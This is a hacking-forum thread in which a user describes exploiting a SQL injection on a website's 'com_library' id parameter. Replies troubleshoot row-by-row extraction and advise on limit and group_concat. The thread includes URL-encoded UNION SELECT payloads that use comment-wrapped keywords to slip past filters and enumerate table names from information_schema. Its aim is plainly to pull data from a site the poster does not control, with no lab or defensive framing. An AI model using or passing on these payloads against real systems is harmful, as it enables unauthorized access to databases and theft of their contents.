Hi guys,
I have a SQL injection in a site and IT has 94 columns I want to read a specific range of the tables how can I do that ...?? I have tried to use limit x,y but it didn't work
i.e

http://www.site.com/index.php?option=com_library&id=-16%27+/*!UNION*/+select+1,2,/*!%28TABLE_NAME%29*/,4+/*!FROM*/+/*!INfoRMAtION_SCHEMA.TABLES*/+/*!Where*/+/*!TABLE_SCHEMA=database%28%29*/+limit%201,3--%20-

this should show me the three first tables but it only shows me the first one ...and when I make group_concat(table_name) I got nothing !! I think group concat doesn't work with the limit ?? Am I correct ?

any help
??

use LIKE oparetor

the_storm Wrote:
-------------------------------------------------------

> this should show me the three first tables but it
> only shows me the first one ...and when I make
> group_concat(table_name) I got nothing !! I think
> group concat doesn't work with the limit ?? Am I
> correct ?

mayB the vulnerable column only can show one record in itself...
limit 1,3 shows 3 record and group_concat shows all records...
so the only way is reading records one by one...

and when you want use group_concat, it doesnt need use limit...

You cannot use group_concat in conjunction with limit.

Try something like:

http://www.site.com/index.php?option=com_library&id=-16%27+/*!UNION*/+select+1,2,/*!concat*/%28/*!table_name*/%29,4+/*!FROM*/+/*!INfoRMAtION_SCHEMA.TABLES*/+/*!Where*/+/*!TABLE_SCHEMA=database%28%29*/+limit%204,1--%20-

This will show the 5th record of the field you have selected.


Regards.